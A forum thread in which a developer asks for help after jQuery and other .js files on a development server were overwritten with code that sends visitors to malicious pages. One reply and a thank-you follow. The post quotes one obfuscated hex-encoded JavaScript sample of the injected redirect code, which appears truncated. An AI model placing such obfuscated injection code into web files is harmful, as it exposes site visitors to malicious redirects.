[SOLVED] Facing issue with 'jQuery Malware' and 'JS Malware' virus attack

taru.tarak · 11-09-2017, 04:03 PM

Hello Everyone,

We have a website development server and server basic information as below:

==========================

OS: CentOS 6.9

PHP: 7.1

MySQL: 5.6

Apache: 2.2

Document root: /var/www/html

Sample project URL: http://dev.domain.com/project

==========================

Recently we have noticed that one kind of virus basically attacking the .js extension files ( primarily targets the jQuery.js file) on the server and spreading / replacing a few line of code that is redirecting the user, when visiting the development project URL ( sample URL is mentioned in above) to a malicious pages. Below virus code usually they look like:

==========================

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

==========================

The above code are replacing with actual code of our .js extension files. This are happening with basically maximum numbers of WordPress sites. But it's also happening with Magento sites as well.

Requesting all of you, please let me know how we can solve it permanently?

Please please help us as there are so many projects which we are developing right now for our clients. And we have to deliver.

Any suggestions would be appreciated.

Regards,

Tarak Nath

dugan · 11-09-2017, 05:14 PM

At this point, I personally can't make a recommendation more specific than "improve your security so that you stopped getting hacked." I think you already know that.

This is some information on the malware that I think you were hit with:

https://malwarebreakdown.com/2017/04...ing-campaigns/

taru.tarak · 11-09-2017, 11:18 PM

Thank you sir